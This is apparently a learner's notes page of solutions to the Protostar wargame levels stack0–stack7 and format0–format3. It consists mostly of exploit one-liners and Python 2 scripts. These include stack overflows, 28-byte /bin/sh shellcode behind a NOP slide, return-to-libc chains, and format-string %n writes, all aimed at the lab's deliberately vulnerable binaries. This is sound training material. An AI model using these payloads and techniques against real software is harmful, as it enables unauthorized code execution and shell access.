NOTE: For some reason Exploit-Exercises.com is no longer available, so this page won't be updated.
Well, I started watching LiveOverflow, and he explains the theory behind these challenges very well.
Most of the levels here I didn't solve myself, as I was still learning how to debug programs. I followed his videos, watching them over and over again until I understood the level.
Afterwards I try to solve them myself and post the results here.
This page is mostly for my own reference, as it holds some techniques that are useful for further challenges.
# Protostar notes, one command per level, in level order. The `#exploit.py`
# lines are the separate Python 2 scripts (print-statement syntax) that the
# preceding command runs, collapsed onto a single line by the paste; as shown
# they are not runnable and would need restoring to one statement per line.
# Absolute addresses (0x0804xxxx, 0xb7xxxxxx, 0xbffffxxx) were read from gdb
# on the challenge VM (see the "p system" comment below) and are specific to
# that build; they are not expected to hold elsewhere. The fixed addresses and
# the %n writes presumably rely on the binaries being built without ASLR,
# stack protector, NX and FORTIFY_SOURCE — not verified here.

# stack0: 64 filler bytes followed by a single "B", on stdin.
python -c 'print "A"*64+"B"' | /opt/protostar/bin/stack0
# stack1: 64 filler bytes, then the bytes 64 63 62 61 (little-endian 0x61626364), passed as argv[1].
./stack1 $(python -c 'print "A"*(16*4) + "\x64\x63\x62\x61"')
# stack2: the same 64-byte filler followed by 0a 0d 0a 0d 0a, delivered through the GREENIE environment variable.
export GREENIE=$(python -c 'print "A"*(16*4) + "\x0a\x0d\x0a\x0d\x0a"')
# stack3: 64 filler bytes, then 0x08048424 in little-endian byte order, on stdin.
python -c "print 'A'*(4*16)+'\x24\x84\x04\x08'" | ./stack3
# stack4: 72 filler bytes, the marker "SSSS", then 0x080483f4 little-endian, on stdin.
python -c "print 'A'*(18*4)+'SSSS'+'\xf4\x83\x04\x08'" | ./stack4
# stack5: the script's output is piped in first; the trailing `cat` keeps the
# pipe open so the terminal's stdin is forwarded after the script exits.
(python exploit.py ; cat) | /opt/protostar/bin/stack5
# exploit.py for stack5: 76 bytes of padding (19 four-byte groups), a
# struct.pack('I', ...) of 0xbffff7bc+30 (an alternative 0xbffff7c0+30 is left
# commented out), 100 NOP bytes (0x90) as the slide, then a 28-byte payload.
#exploit.py import struct padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS" eip=struct.pack("I", 0xbffff7bc+30) #0xbffff7c0+30) nopslide="\x90"*100 payload="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" print padding+eip+nopslide+payload
# stack6: return-to-libc layout, per the script's own comments — 80 bytes of
# padding ("0000" plus 19 groups), the address of system(), a throw-away
# return address, then the address of a "/bin/sh" string inside libc.
(python exploit.py ; cat) | /opt/protostar/bin/stack6
#exploit.py import struct padding = "0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS" # Where we control the stack system = struct.pack("I", 0xb7ecffb0) # address of libc System we found by entering p system in gdb ret = "AAAA" # return after system, not important bin_sh = struct.pack("I", 0xb7fb63bf) # real address of /bin/sh into libc (libc address + offset we found) print padding+system+ret+bin_sh
# stack7: same layout with one extra hop — a `ret` inside getpath() comes
# first, then system(). The "/bin/sh" pointer matches the stack6 value:
# 0xb7e97000 + 0x11f3bf == 0xb7fb63bf. Padding here is 80 bytes (20 groups).
(python /tmp/exploit.py; cat) | ./stack7
#exploit.py import struct padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT" # Junk return_0 = struct.pack('I', 0x08048544) # address of ret in getpath() return_1 = struct.pack('I', 0xb7ecffb0) # address of system (p system) return_2 = "JJJJ" # junk shell = struct.pack('I', 0xb7fb63bf) # "/bin/sh" libc=0xb7e97000 + offset=0x11f3bf print padding+return_0+return_1+return_2+shell
# format0: "%64d" followed by ef be ad de (little-endian 0xdeadbeef), passed as argv[1].
./format0 `python -c 'print "%64d\xef\xbe\xad\xde"'`
# format1: only the argument survives on this line — no binary is named
# (presumably ./format1; the outer quotes and backticks look pasted from a
# larger command). Layout: "AAAA", 0x08049638 little-endian, "BBBB", then
# 128 "%x " items (127 + 1).
"`python -c "print 'AAAA'+'\x38\x96\x04\x08'+'BBBB'+'%x '*127+'%x '"`"
# format2: 0x080496e4 little-endian, "%44x", two "%x", then a single "%n" write, on stdin.
python -c "print '\xe4\x96\x04\x08'+'%44x'+'%x'*2+'%n'" | ./format2
# format3: three "%n" writes in one input, targeting 0x080496f4, 0x080496f5
# and 0x080496f7 in turn; each "%n" is preceded by its own width padding
# (%4x, %468x, %111x) that controls the count it stores. On stdin.
python -c "print '\xf4\x96\x04\x08'+'%4x'+'%x'*10+'%n' + 'AAA\xf5\x96\x04\x08'+'%x.'*6+'%468x'+'%n' + 'AAA\xf7\x96\x04\x08'+'%x.'*6+'%111x'+'%n'" | ./format3